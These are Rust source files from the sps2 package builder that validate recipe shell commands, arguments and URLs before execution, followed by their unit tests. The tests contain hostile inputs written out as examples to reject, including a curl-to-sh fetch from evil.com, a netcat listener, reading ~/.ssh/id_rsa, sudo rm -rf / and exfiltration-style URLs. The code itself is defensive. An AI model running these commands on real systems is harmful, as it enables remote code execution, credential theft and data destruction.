self.changed_files.write().await.clear();
}
}
impl Default for IncrementalBuildTracker {
fn default() -> Self {
Self::new()
}
}
/// Cache statistics
#[derive(Debug, Clone, Default)]
pub struct CacheStatistics {
/// Number of cache hits
pub cache_hits: u64,
/// Number of cache misses
pub cache_misses: u64,
/// Number of artifacts cached
pub artifacts_cached: u64,
/// Number of evictions
pub evictions: u64,
}
impl CacheStatistics {
/// Get cache hit rate
#[must_use]
#[allow(clippy::cast_precision_loss)] // Acceptable for percentage calculation
pub fn hit_rate(&self) -> f64 {
let total = self.cache_hits + self.cache_misses;
if total == 0 {
0.0
} else {
(self.cache_hits as f64 / total as f64) * 100.0
}
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/validation/command.rs | crates/builder/src/validation/command.rs | //! Command parsing and validation
//!
//! This module provides secure command parsing and validation to prevent
//! execution of dangerous commands during the build process.
use super::rules::{DANGEROUS_PATTERNS, SYSTEM_PATHS};
use sps2_errors::{BuildError, Error};
/// Parsed and validated command
#[derive(Debug, Clone)]
pub struct ValidatedCommand {
pub program: String,
pub args: Vec<String>,
}
/// Parse and validate a simple command string
pub fn parse_and_validate_command(
command: &str,
sps2_config: Option<&sps2_config::Config>,
) -> Result<ValidatedCommand, Error> {
let command = command.trim();
if command.is_empty() {
return Err(BuildError::CommandParseError {
command: command.to_string(),
reason: "Empty command".to_string(),
}
.into());
}
// Split command into program and arguments
let parts: Vec<&str> = command.split_whitespace().collect();
if parts.is_empty() {
return Err(BuildError::CommandParseError {
command: command.to_string(),
reason: "No command specified".to_string(),
}
.into());
}
let program = parts[0];
let args: Vec<String> = parts[1..].iter().map(|&s| s.to_string()).collect();
// Validate the program
validate_program(program, command, sps2_config)?;
// Special validation for specific programs
if program == "rsync" {
validate_rsync_command(&args, command)?;
}
// Validate arguments
for arg in &args {
validate_argument(arg, command)?;
}
Ok(ValidatedCommand {
program: program.to_string(),
args,
})
}
/// Validate a shell command (executed with sh -c)
pub fn validate_shell_command(
shell: &str,
sps2_config: Option<&sps2_config::Config>,
) -> Result<(), Error> {
// Use the new parser-based validation
let tokens = super::parser::tokenize_shell(shell);
super::parser::validate_tokens(&tokens, sps2_config)?;
// Still check for dangerous patterns that might slip through tokenization
for pattern in DANGEROUS_PATTERNS {
if shell.contains(pattern) {
return Err(BuildError::DangerousCommand {
command: shell.to_string(),
reason: format!("Shell command contains dangerous pattern: {pattern}"),
}
.into());
}
}
Ok(())
}
/// Validate a program name
fn validate_program(
program: &str,
full_command: &str,
sps2_config: Option<&sps2_config::Config>,
) -> Result<(), Error> {
// Check config if available
if let Some(config) = sps2_config {
if !config.is_command_allowed(program) {
return Err(BuildError::DangerousCommand {
command: full_command.to_string(),
reason: format!("Command '{program}' is not in the allowed commands list"),
}
.into());
}
} else {
// No config means no allowed commands - strict allowlist approach
return Err(BuildError::DangerousCommand {
command: full_command.to_string(),
reason: "No configuration provided - cannot validate allowed commands".to_string(),
}
.into());
}
// Special validation for rm command
if program == "rm" {
validate_rm_command(full_command)?;
}
// Note: Privilege escalation commands (sudo, doas, su) should be in the
// disallowed list in config.toml, but we double-check here for safety
if program == "sudo" || program == "doas" || program == "su" {
return Err(BuildError::DangerousCommand {
command: full_command.to_string(),
reason: "Privilege escalation commands are not allowed".to_string(),
}
.into());
}
// Check for path traversal in program name
if program.contains("..") {
return Err(BuildError::InvalidPath {
path: program.to_string(),
reason: "Path traversal in command name is not allowed".to_string(),
}
.into());
}
Ok(())
}
/// Validate a command argument
fn validate_argument(arg: &str, full_command: &str) -> Result<(), Error> {
// Check for dangerous rm patterns
if full_command.starts_with("rm ") || full_command.contains(" rm ") {
validate_rm_argument(arg, full_command)?;
}
// Check for system paths
for system_path in SYSTEM_PATHS {
// Skip if the argument contains a variable expansion - these are evaluated at build time
if arg.contains("${") {
continue;
}
// Only check if argument starts with or equals a system path
// "/" alone is too broad - it catches normal paths like "src/"
if (arg == *system_path
|| (system_path != &"/" && arg.starts_with(&format!("{system_path}/"))))
&& !is_safe_system_path_usage(full_command, system_path)
{
return Err(BuildError::DangerousCommand {
command: full_command.to_string(),
reason: format!("Argument references system path: {system_path}"),
}
.into());
}
}
// Check for command injection attempts in arguments
if arg.contains(';') || arg.contains('|') || arg.contains('&') {
// These might be legitimate in quoted strings, but we err on the side of caution
return Err(BuildError::CommandParseError {
command: full_command.to_string(),
reason: "Command separators in arguments are not allowed".to_string(),
}
.into());
}
Ok(())
}
/// Validate rm command specifically
fn validate_rm_command(full_command: &str) -> Result<(), Error> {
let parts: Vec<&str> = full_command.split_whitespace().collect();
// Check if command has both -r and -f flags (in any combination)
let has_recursive = parts.iter().any(|&part| {
part == "-r"
|| part == "-R"
|| part.starts_with('-') && part.contains('r') && !part.starts_with("--")
});
let has_force = parts.iter().any(|&part| {
part == "-f" || part.starts_with('-') && part.contains('f') && !part.starts_with("--")
});
// Block rm -rf in any form
if has_recursive && has_force {
return Err(BuildError::DangerousCommand {
command: full_command.to_string(),
reason: "rm -rf is not allowed in build scripts".to_string(),
}
.into());
}
// Even without -rf, validate what's being removed
for part in parts.iter().skip(1) {
// Skip "rm" itself
if !part.starts_with('-') {
validate_rm_target(part, full_command)?;
}
}
Ok(())
}
/// Validate rm command arguments specifically
fn validate_rm_argument(arg: &str, full_command: &str) -> Result<(), Error> {
validate_rm_target(arg, full_command)
}
/// Validate what rm is trying to delete
fn validate_rm_target(target: &str, full_command: &str) -> Result<(), Error> {
// Block rm -rf /
if target == "/" || target == "/*" {
return Err(BuildError::DangerousCommand {
command: full_command.to_string(),
reason: "Attempting to delete root filesystem".to_string(),
}
.into());
}
// Block rm of system directories
for system_path in SYSTEM_PATHS {
if target == *system_path || target.starts_with(&format!("{system_path}/")) {
return Err(BuildError::DangerousCommand {
command: full_command.to_string(),
reason: format!("Attempting to delete system directory: {system_path}"),
}
.into());
}
}
Ok(())
}
/// Check if a system path usage is safe (e.g., reading from /usr/include is ok)
fn is_safe_system_path_usage(command: &str, system_path: &str) -> bool {
// Allow reading from certain system paths
match system_path {
"/usr/include" | "/usr/lib" | "/usr/local" => {
// These are commonly read during builds
!command.contains("rm ") && !command.contains("mv ") && !command.contains("chmod ")
}
"/" => {
// Special case for root path - it's often used in paths like ${DESTDIR}/opt/pm/...
// Allow if it's part of a variable expansion or build-related path
command.contains("${DESTDIR}") ||
command.contains("${PREFIX}") ||
command.contains("/opt/pm/build/") ||
// Allow cd command with paths that include variables
(command.starts_with("cd ") && command.contains("${"))
}
"/opt/pm/live" => {
// Allow operations in live directory when prefixed with DESTDIR
command.contains("${DESTDIR}")
}
_ => false,
}
}
// Note: More sophisticated path and command validation is handled by SecurityContext
// during execution, which tracks state and handles variable expansion properly.
/// Validate rsync command specifically
fn validate_rsync_command(args: &[String], full_command: &str) -> Result<(), Error> {
// Check if it's trying to use remote rsync
if super::rules::is_remote_rsync(args) {
return Err(BuildError::DangerousCommand {
command: full_command.to_string(),
reason: "Remote rsync operations are not allowed during builds".to_string(),
}
.into());
}
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_parse_simple_command() {
let cfg = sps2_config::Config::default();
let cmd = parse_and_validate_command("echo -n", Some(&cfg)).unwrap();
assert_eq!(cmd.program, "echo");
assert_eq!(cmd.args, vec!["-n"]);
}
#[test]
fn test_block_dangerous_commands() {
let cfg = sps2_config::Config::default();
assert!(parse_and_validate_command("rm -rf /", Some(&cfg)).is_err());
assert!(parse_and_validate_command("sudo make install", Some(&cfg)).is_err());
assert!(parse_and_validate_command("chmod 777 /etc/passwd", Some(&cfg)).is_err());
}
#[test]
fn test_validate_shell_command() {
let config = sps2_config::Config::default();
assert!(validate_shell_command("echo 'Hello World'", Some(&config)).is_ok());
assert!(validate_shell_command("cd build && make", Some(&config)).is_ok());
assert!(validate_shell_command("sudo make install", Some(&config)).is_err());
assert!(validate_shell_command("rm -rf /", Some(&config)).is_err());
}
#[test]
fn test_command_substitution_validation() {
let config = sps2_config::Config::default();
assert!(validate_shell_command("echo $(pwd)", Some(&config)).is_ok());
assert!(validate_shell_command("echo $(sudo cat /etc/passwd)", Some(&config)).is_err());
}
#[test]
fn test_rsync_validation() {
// Local rsync should be allowed
let cfg = sps2_config::Config::default();
let cmd = parse_and_validate_command("rsync -av src/ dest/", Some(&cfg)).unwrap();
assert_eq!(cmd.program, "rsync");
// Remote rsync should be blocked
assert!(parse_and_validate_command("rsync -av user@host:/path ./", Some(&cfg)).is_err());
assert!(parse_and_validate_command("rsync -av ./ host:/path", Some(&cfg)).is_err());
}
#[test]
fn test_dangerous_patterns() {
// Test various dangerous shell patterns
assert!(validate_shell_command("echo 'test' > /etc/passwd", None).is_err());
assert!(validate_shell_command("cat ~/.ssh/id_rsa", None).is_err());
assert!(validate_shell_command("export PATH=/evil/path:$PATH", None).is_err());
assert!(validate_shell_command("nohup ./daemon &", None).is_err());
}
#[test]
fn test_url_validation() {
use super::super::validate_url;
// Good URLs
assert!(validate_url("https://github.com/example/repo").is_ok());
assert!(validate_url("https://example.com/file.tar.gz").is_ok());
// Suspicious URLs
assert!(validate_url("https://webhook.site/test").is_err());
assert!(validate_url("https://example.ngrok.io/data").is_err());
assert!(validate_url("http://example.com:4444/shell").is_err());
assert!(validate_url("file:///etc/passwd").is_err());
}
#[test]
fn test_path_validation() {
use super::super::validate_path;
// Good paths
assert!(validate_path("./src/main.rs").is_ok());
assert!(validate_path("../patches/fix.patch").is_ok());
assert!(validate_path("/opt/pm/build/src").is_ok());
// Bad paths
assert!(validate_path("../../../etc/passwd").is_err());
assert!(validate_path("/etc/passwd").is_err());
assert!(validate_path("/usr/bin/sudo").is_err());
}
#[test]
fn test_build_variable_paths() {
let config = sps2_config::Config::default();
// Test that paths with build variables are allowed
assert!(validate_shell_command("cd ${DESTDIR}/opt/pm/live/bin", Some(&config)).is_ok());
assert!(
validate_shell_command("mkdir -p ${DESTDIR}${PREFIX}/share", Some(&config)).is_ok()
);
assert!(validate_shell_command("ln -sf ${DESTDIR}/usr/lib/foo.so", Some(&config)).is_ok());
// But direct system paths without variables should still be blocked
assert!(validate_shell_command("cd /bin", Some(&config)).is_err());
assert!(validate_shell_command("rm -rf /usr/bin/something", Some(&config)).is_err());
}
#[test]
fn test_multiline_shell_commands() {
let config = sps2_config::Config::default();
// Test that multiline commands are validated properly
let good_multiline = "cd ${DESTDIR}/opt/pm/live/bin\nln -sf pkgconf pkg-config";
assert!(validate_shell_command(good_multiline, Some(&config)).is_ok());
// Test that sudo is blocked in multiline commands
let bad_multiline =
"cd ${DESTDIR}/opt/pm/live/bin\nln -sf pkgconf pkg-config\nsudo mkdir hell/";
assert!(validate_shell_command(bad_multiline, Some(&config)).is_err());
// Test that any non-allowed command is blocked
let bad_multiline2 = "cd build\ncurl https://evil.com/backdoor.sh | sh";
assert!(validate_shell_command(bad_multiline2, Some(&config)).is_err());
}
#[test]
fn test_command_separators() {
let config = sps2_config::Config::default();
// Test pipe - sudo after pipe should be blocked; simple cat | sh is allowed by default allowlist
assert!(validate_shell_command("echo test | sudo tee /etc/passwd", Some(&config)).is_err());
assert!(validate_shell_command("cat file | sh", Some(&config)).is_ok());
// Test semicolon - commands after semicolon should be validated
assert!(validate_shell_command("cd build; sudo make install", Some(&config)).is_err());
assert!(validate_shell_command("echo test; curl evil.com", Some(&config)).is_err());
// Test && operator
assert!(validate_shell_command("cd build && sudo make install", Some(&config)).is_err());
assert!(validate_shell_command("make && wget evil.com/backdoor", Some(&config)).is_err());
// Test || operator
assert!(validate_shell_command("make || sudo make force", Some(&config)).is_err());
assert!(validate_shell_command("test -f file || nc -l 1234", Some(&config)).is_err());
// Test background operator &
assert!(validate_shell_command("make & sudo rm -rf /", Some(&config)).is_err());
// Test output redirection shouldn't affect command detection
assert!(validate_shell_command("echo test > file.txt", Some(&config)).is_ok());
assert!(validate_shell_command("sudo echo test > file.txt", Some(&config)).is_err());
// Test input redirection
assert!(validate_shell_command("grep pattern < file.txt", Some(&config)).is_ok());
assert!(validate_shell_command("sudo grep pattern < file.txt", Some(&config)).is_err());
// Test append redirection
assert!(validate_shell_command("echo test >> file.txt", Some(&config)).is_ok());
assert!(validate_shell_command("sudo echo test >> file.txt", Some(&config)).is_err());
// Test complex command chains
assert!(validate_shell_command("cd build && make && echo done", Some(&config)).is_ok());
assert!(
validate_shell_command("cd build && make && sudo make install", Some(&config)).is_err()
);
// Test that allowed commands work with separators
assert!(validate_shell_command("cd build; make; echo done", Some(&config)).is_ok());
assert!(validate_shell_command(
"test -f file && echo exists || echo missing",
Some(&config)
)
.is_ok());
}
#[test]
fn test_command_injection_attempts() {
let config = sps2_config::Config::default();
// Test command substitution attempts
assert!(validate_shell_command("echo $(sudo cat /etc/passwd)", Some(&config)).is_err());
assert!(validate_shell_command("echo `sudo rm -rf /`", Some(&config)).is_err());
// Test escaping attempts
assert!(validate_shell_command("echo test\nsudo rm -rf /", Some(&config)).is_err());
assert!(validate_shell_command("echo test\n\nsudo chmod 777 /", Some(&config)).is_err());
// Test hidden commands with extra spaces/tabs
assert!(validate_shell_command("echo test ; sudo make install", Some(&config)).is_err());
assert!(validate_shell_command("echo test\t;\tsudo make install", Some(&config)).is_err());
// Test commands hidden after comments
assert!(
validate_shell_command("echo test # comment\nsudo rm -rf /", Some(&config)).is_err()
);
// Test here-doc attempts (if someone tries to be clever)
assert!(validate_shell_command("cat << EOF\nsudo rm -rf /\nEOF", Some(&config)).is_err());
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/validation/parser.rs | crates/builder/src/validation/parser.rs | //! Shell command parser for security validation
//!
//! This module implements a simplified shell parser that understands
//! common shell constructs for security validation purposes.
use super::rules::BUILD_VARIABLES;
use sps2_errors::{BuildError, Error};
/// Represents a parsed shell token
#[derive(Debug, Clone, PartialEq)]
pub enum Token {
Command(String),
Argument(String),
Variable(String),
Operator(String),
Redirect(String),
Quote(char),
Comment(String),
}
/// Parse a shell command into tokens
pub fn tokenize_shell(input: &str) -> Vec<Token> {
let mut tokens = Vec::new();
let chars: Vec<char> = input.chars().collect();
let mut i = 0;
while i < chars.len() {
let Some(&ch) = chars.get(i) else {
break;
};
match ch {
// Skip whitespace (but not newlines - they're command separators)
' ' | '\t' | '\r' => i += 1,
// Newlines act as command separators
'\n' => {
tokens.push(Token::Operator("\n".to_string()));
i += 1;
}
// Comments
'#' => i = parse_comment(&chars, i, &mut tokens),
// Quotes and backticks (command substitution)
'"' | '\'' | '`' => i = parse_quoted(&chars, i, ch, &mut tokens),
// Variables
'$' => i = parse_variable(&chars, i, &mut tokens),
// Operators
';' => {
tokens.push(Token::Operator(";".to_string()));
i += 1;
}
'&' => i = parse_ampersand(&chars, i, &mut tokens),
'|' => i = parse_pipe(&chars, i, &mut tokens),
'>' | '<' => i = parse_redirect(&chars, i, &mut tokens),
// Regular tokens
_ => i = parse_word(&chars, i, &mut tokens),
}
}
tokens
}
/// Parse a comment until end of line
fn parse_comment(chars: &[char], mut i: usize, tokens: &mut Vec<Token>) -> usize {
let start = i;
while i < chars.len() && chars.get(i).copied() != Some('\n') {
i += 1;
}
tokens.push(Token::Comment(chars[start..i].iter().collect()));
i
}
/// Parse a quoted string
fn parse_quoted(chars: &[char], mut i: usize, quote_char: char, tokens: &mut Vec<Token>) -> usize {
tokens.push(Token::Quote(quote_char));
i += 1;
let start = i;
while i < chars.len() && chars.get(i).copied() != Some(quote_char) {
if chars.get(i).copied() == Some('\\') && i + 1 < chars.len() {
i += 2; // Skip escaped character
} else {
i += 1;
}
}
if start < i {
let content = chars[start..i].iter().collect::<String>();
// For backticks, parse the content as a command substitution
if quote_char == '`' {
// Add a special token to indicate command substitution
tokens.push(Token::Variable(format!("`{content}`")));
} else {
tokens.push(Token::Argument(content));
}
}
if chars.get(i).copied() == Some(quote_char) {
tokens.push(Token::Quote(quote_char));
i += 1;
}
i
}
/// Parse a variable reference
fn parse_variable(chars: &[char], mut i: usize, tokens: &mut Vec<Token>) -> usize {
let start = i;
i += 1;
if chars.get(i).copied() == Some('{') {
// ${VAR} style
i += 1;
while i < chars.len() && chars.get(i).copied() != Some('}') {
i += 1;
}
if i < chars.len() {
i += 1; // Skip closing }
}
} else {
// $VAR style
while i < chars.len()
&& chars
.get(i)
.is_some_and(|&c| c.is_alphanumeric() || c == '_')
{
i += 1;
}
}
tokens.push(Token::Variable(chars[start..i].iter().collect()));
i
}
/// Parse & or &&
fn parse_ampersand(chars: &[char], mut i: usize, tokens: &mut Vec<Token>) -> usize {
if chars.get(i + 1).copied() == Some('&') {
tokens.push(Token::Operator("&&".to_string()));
i += 2;
} else {
tokens.push(Token::Operator("&".to_string()));
i += 1;
}
i
}
/// Parse | or ||
fn parse_pipe(chars: &[char], mut i: usize, tokens: &mut Vec<Token>) -> usize {
if chars.get(i + 1).copied() == Some('|') {
tokens.push(Token::Operator("||".to_string()));
i += 2;
} else {
tokens.push(Token::Operator("|".to_string()));
i += 1;
}
i
}
/// Parse redirections
fn parse_redirect(chars: &[char], mut i: usize, tokens: &mut Vec<Token>) -> usize {
let start = i;
i += 1;
if chars.get(i).copied() == chars.get(start).copied() {
i += 1; // >> or <<
}
tokens.push(Token::Redirect(chars[start..i].iter().collect()));
i
}
/// Parse a word (command or argument)
fn parse_word(chars: &[char], mut i: usize, tokens: &mut Vec<Token>) -> usize {
let start = i;
while i < chars.len() {
let Some(¤t_char) = chars.get(i) else {
break;
};
if current_char.is_whitespace()
|| matches!(
current_char,
';' | '&' | '|' | '>' | '<' | '"' | '\'' | '$' | '#'
)
{
break;
}
if chars.get(i).copied() == Some('\\') && i + 1 < chars.len() {
i += 2; // Skip escaped character
} else {
i += 1;
}
}
let text: String = chars[start..i].iter().collect();
// Determine if this is a command or argument based on context
let is_command = tokens.is_empty() || matches!(tokens.last(), Some(Token::Operator(_)));
if is_command {
tokens.push(Token::Command(text));
} else {
tokens.push(Token::Argument(text));
}
i
}
/// Validate a tokenized shell command
pub fn validate_tokens(
tokens: &[Token],
sps2_config: Option<&sps2_config::Config>,
) -> Result<(), Error> {
for (i, _) in tokens.iter().enumerate() {
match &tokens[i] {
Token::Command(cmd) => {
// Special handling for specific commands
match cmd.as_str() {
"rm" => validate_rm_tokens(&tokens[i..])?,
"cd" => {
// Validate cd target
if let Some(Token::Argument(path)) = tokens.get(i + 1) {
validate_cd_path(path)?;
}
}
_ => {}
}
// Check if command is in allowlist (unless it's a path)
if !cmd.contains('/') {
// Use config if available
if let Some(config) = sps2_config {
if !config.is_command_allowed(cmd) {
return Err(BuildError::DangerousCommand {
command: cmd.clone(),
reason: format!(
"Command '{cmd}' is not in the allowed commands list"
),
}
.into());
}
} else {
// If no config provided, be conservative and reject unknown commands
return Err(BuildError::DangerousCommand {
command: cmd.clone(),
reason: "No configuration provided for allowed commands".to_string(),
}
.into());
}
}
}
Token::Argument(arg) => {
// Validate arguments based on the preceding command
if let Some(Token::Command(cmd)) = tokens.get(i.saturating_sub(1)) {
validate_command_argument(cmd, arg)?;
}
}
Token::Variable(var) => {
// Check for command substitution (backticks)
if var.starts_with('`') && var.ends_with('`') {
// Extract the command inside backticks
let inner_cmd = &var[1..var.len() - 1];
// Recursively validate the inner command
let inner_tokens = tokenize_shell(inner_cmd);
validate_tokens(&inner_tokens, sps2_config)?;
} else if !is_safe_variable(var) {
// Variables we don't recognize could be dangerous
// but we'll allow them with a warning for now
}
}
Token::Operator(op) => {
if op.as_str() == "&" {
// Background execution not allowed
return Err(BuildError::DangerousCommand {
command: format!("... {op}"),
reason: "Background execution is not allowed in build scripts".to_string(),
}
.into());
}
// Other operators (";", "&&", "||", "|") are ok
}
Token::Redirect(_) => {
// Validate the target of redirections
if let Some(Token::Argument(target)) = tokens.get(i + 1) {
validate_redirect_target(target)?;
}
}
Token::Quote(_) | Token::Comment(_) => {
// These are ok
}
}
}
Ok(())
}
/// Validate cd path
fn validate_cd_path(path: &str) -> Result<(), Error> {
// Note: This is a simplified validation used when SecurityContext is not available.
// The SecurityContext provides more comprehensive validation with variable expansion.
// Allow if path contains build variables - will be validated after expansion
for var in BUILD_VARIABLES {
if path.contains(var) {
return Ok(());
}
}
// Allow relative paths and paths within build directory
if !path.starts_with('/') || path.starts_with("/opt/pm/build/") {
return Ok(());
}
// Block cd to system directories (only if it's an absolute path to a system dir)
if path == "/"
|| path == "/etc"
|| path.starts_with("/etc/")
|| path == "/usr"
|| path.starts_with("/usr/")
|| path == "/bin"
|| path.starts_with("/bin/")
{
return Err(BuildError::DangerousCommand {
command: format!("cd {path}"),
reason: "Cannot change to system directories".to_string(),
}
.into());
}
Ok(())
}
/// Validate rm command with its arguments
fn validate_rm_tokens(tokens: &[Token]) -> Result<(), Error> {
let mut has_r = false;
let mut has_f = false;
for token in tokens.iter().skip(1) {
match token {
Token::Argument(arg) => {
// Check for -r/-R and -f flags
if arg.starts_with('-') && !arg.starts_with("--") {
if arg.contains('r') || arg.contains('R') {
has_r = true;
}
if arg.contains('f') {
has_f = true;
}
} else {
// This is a path argument
validate_rm_path(arg)?;
}
}
Token::Operator(_) => break, // End of this command
_ => {}
}
}
// Block rm -rf
if has_r && has_f {
return Err(BuildError::DangerousCommand {
command: "rm -rf".to_string(),
reason: "rm -rf is not allowed in build scripts".to_string(),
}
.into());
}
Ok(())
}
/// Validate a path for rm command
fn validate_rm_path(path: &str) -> Result<(), Error> {
// Allow if it contains build variables
for var in BUILD_VARIABLES {
if path.contains(var) {
return Ok(());
}
}
// Block dangerous paths
if path == "/" || path == "/*" || path.starts_with("/etc") || path.starts_with("/usr") {
return Err(BuildError::DangerousCommand {
command: format!("rm {path}"),
reason: "Attempting to delete system directories".to_string(),
}
.into());
}
Ok(())
}
/// Validate command arguments
fn validate_command_argument(cmd: &str, arg: &str) -> Result<(), Error> {
match cmd {
"chmod" => {
// Don't allow chmod on system files
if arg.starts_with("/etc") || arg.starts_with("/usr") || arg.starts_with("/bin") {
return Err(BuildError::DangerousCommand {
command: format!("{cmd} {arg}"),
reason: "Cannot modify permissions on system files".to_string(),
}
.into());
}
}
_ => {
// General validation for paths
// Allow paths with build variables
for var in BUILD_VARIABLES {
if arg.contains(var) {
return Ok(());
}
}
}
}
Ok(())
}
/// Validate redirect targets
fn validate_redirect_target(target: &str) -> Result<(), Error> {
// Allow /dev/null as it's commonly used and safe
if target == "/dev/null" {
return Ok(());
}
// Block redirects to other system files
if target.starts_with("/etc") || target.starts_with("/dev") || target.starts_with("/sys") {
return Err(BuildError::DangerousCommand {
command: format!("> {target}"),
reason: "Cannot redirect output to system files".to_string(),
}
.into());
}
Ok(())
}
/// Check if a variable is safe
fn is_safe_variable(var: &str) -> bool {
BUILD_VARIABLES.contains(&var) ||
var == "$?" || // Exit code
var == "$$" || // Process ID
var == "$#" || // Argument count
var == "$@" || // All arguments
var == "$*" // All arguments as single string
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_tokenize_simple() {
let tokens = tokenize_shell("echo hello world");
assert_eq!(tokens.len(), 3);
assert_eq!(tokens[0], Token::Command("echo".to_string()));
assert_eq!(tokens[1], Token::Argument("hello".to_string()));
assert_eq!(tokens[2], Token::Argument("world".to_string()));
}
#[test]
fn test_tokenize_with_redirect() {
let tokens = tokenize_shell("echo test > file.txt");
println!("Tokens: {tokens:?}");
assert!(tokens.len() >= 4);
assert_eq!(tokens[0], Token::Command("echo".to_string()));
assert_eq!(tokens[1], Token::Argument("test".to_string()));
assert_eq!(tokens[2], Token::Redirect(">".to_string()));
assert_eq!(tokens[3], Token::Argument("file.txt".to_string()));
}
#[test]
fn test_tokenize_with_variables() {
let tokens = tokenize_shell("cd ${DESTDIR}/bin");
assert_eq!(tokens.len(), 3);
assert_eq!(tokens[0], Token::Command("cd".to_string()));
assert_eq!(tokens[1], Token::Variable("${DESTDIR}".to_string()));
assert_eq!(tokens[2], Token::Argument("/bin".to_string()));
}
#[test]
fn test_validate_allowed_commands() {
// Create a test config with allowed commands
let config = sps2_config::Config::default();
let tokens = tokenize_shell("make install");
assert!(validate_tokens(&tokens, Some(&config)).is_ok());
let tokens = tokenize_shell("./configure --prefix=/opt/pm/live");
assert!(validate_tokens(&tokens, Some(&config)).is_ok());
}
#[test]
fn test_validate_dangerous_commands() {
let tokens = tokenize_shell("sudo make install");
assert!(validate_tokens(&tokens, None).is_err());
let tokens = tokenize_shell("apt-get install foo");
assert!(validate_tokens(&tokens, None).is_err());
}
#[test]
fn test_validate_rm_rf() {
let config = sps2_config::Config::default();
let tokens = tokenize_shell("rm -rf /tmp/build");
assert!(validate_tokens(&tokens, Some(&config)).is_err());
let tokens = tokenize_shell("rm -f file.txt");
assert!(validate_tokens(&tokens, Some(&config)).is_ok());
}
#[test]
fn test_validate_background_execution() {
let tokens = tokenize_shell("./daemon &");
assert!(validate_tokens(&tokens, None).is_err());
}
#[test]
fn test_validate_with_build_variables() {
let config = sps2_config::Config::default();
let tokens = tokenize_shell("cd ${DESTDIR}/opt/pm/live/bin");
assert!(validate_tokens(&tokens, Some(&config)).is_ok());
let tokens = tokenize_shell("rm ${BUILD_DIR}/temp.o");
assert!(validate_tokens(&tokens, Some(&config)).is_ok());
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/validation/mod.rs | crates/builder/src/validation/mod.rs | //! Recipe validation layer
//!
//! This module validates YAML recipe steps before they are converted to
//! execution types, ensuring security and correctness.
pub mod command;
pub mod parser;
pub mod rules;
use crate::recipe::model::{ParsedStep, PostCommand};
use crate::stages::{BuildCommand, PostStep, SourceStep};
use sps2_errors::{BuildError, Error};
/// Validate and convert a source step
pub fn validate_source_step(step: &SourceStep, _recipe_dir: &std::path::Path) -> Result<(), Error> {
match step {
SourceStep::Fetch { url, .. }
| SourceStep::FetchMd5 { url, .. }
| SourceStep::FetchSha256 { url, .. }
| SourceStep::FetchBlake3 { url, .. } => {
validate_url(url)?;
}
SourceStep::Git { url, .. } => {
validate_git_url(url)?;
}
SourceStep::Copy {
src_path: Some(path),
}
| SourceStep::ApplyPatch { path } => {
validate_path(path)?;
}
SourceStep::Copy { src_path: None } | SourceStep::Cleanup | SourceStep::Extract { .. } => {}
}
Ok(())
}
/// Validate and convert a parsed build step to an executable command
pub fn validate_build_step(
step: &ParsedStep,
sps2_config: Option<&sps2_config::Config>,
) -> Result<BuildCommand, Error> {
match step {
ParsedStep::Command { command } => {
let validated = command::parse_and_validate_command(command, sps2_config)?;
Ok(BuildCommand::Command {
program: validated.program,
args: validated.args,
})
}
ParsedStep::Shell { shell } => {
command::validate_shell_command(shell, sps2_config)?;
Ok(BuildCommand::Command {
program: "sh".to_string(),
args: vec!["-c".to_string(), shell.clone()],
})
}
ParsedStep::Configure { configure } => {
validate_arguments(configure)?;
Ok(BuildCommand::Configure {
args: configure.clone(),
})
}
ParsedStep::Make { make } => {
validate_arguments(make)?;
Ok(BuildCommand::Make { args: make.clone() })
}
ParsedStep::Cmake { cmake } => {
validate_arguments(cmake)?;
Ok(BuildCommand::Cmake {
args: cmake.clone(),
})
}
ParsedStep::Meson { meson } => {
validate_arguments(meson)?;
Ok(BuildCommand::Meson {
args: meson.clone(),
})
}
ParsedStep::Cargo { cargo } => {
validate_arguments(cargo)?;
Ok(BuildCommand::Cargo {
args: cargo.clone(),
})
}
ParsedStep::Go { go } => {
validate_arguments(go)?;
Ok(BuildCommand::Go { args: go.clone() })
}
ParsedStep::Python { python } => {
validate_arguments(python)?;
Ok(BuildCommand::Python {
args: python.clone(),
})
}
ParsedStep::Nodejs { nodejs } => {
validate_arguments(nodejs)?;
Ok(BuildCommand::NodeJs {
args: nodejs.clone(),
})
}
}
}
/// Validate and convert a post command
pub fn validate_post_command(
command: &PostCommand,
sps2_config: Option<&sps2_config::Config>,
) -> Result<PostStep, Error> {
match command {
PostCommand::Simple(cmd) => {
let validated = command::parse_and_validate_command(cmd, sps2_config)?;
Ok(PostStep::Command {
program: validated.program,
args: validated.args,
})
}
PostCommand::Shell { shell } => {
command::validate_shell_command(shell, sps2_config)?;
Ok(PostStep::Command {
program: "sh".to_string(),
args: vec!["-c".to_string(), shell.clone()],
})
}
}
}
/// Validate a URL
pub(crate) fn validate_url(url: &str) -> Result<(), Error> {
// Block file:// URLs
if url.starts_with("file://") {
return Err(BuildError::InvalidUrlValidation {
url: url.to_string(),
reason: "file:// URLs are not allowed for security reasons".to_string(),
}
.into());
}
// Block suspicious URLs
if rules::is_suspicious_url(url) {
return Err(BuildError::InvalidUrlValidation {
url: url.to_string(),
reason: "URL appears suspicious (webhook, ngrok, non-standard port, etc.)".to_string(),
}
.into());
}
// Block localhost/internal IPs in production
if url.contains("localhost") || url.contains("127.0.0.1") || url.contains("0.0.0.0") {
return Err(BuildError::InvalidUrlValidation {
url: url.to_string(),
reason: "URLs pointing to localhost are not allowed".to_string(),
}
.into());
}
Ok(())
}
/// Validate a git URL
fn validate_git_url(url: &str) -> Result<(), Error> {
// Git URLs can be https://, git://, or ssh (git@github.com:)
if url.starts_with("file://") {
return Err(BuildError::InvalidUrlValidation {
url: url.to_string(),
reason: "file:// URLs are not allowed for git operations".to_string(),
}
.into());
}
Ok(())
}
/// Validate a file path
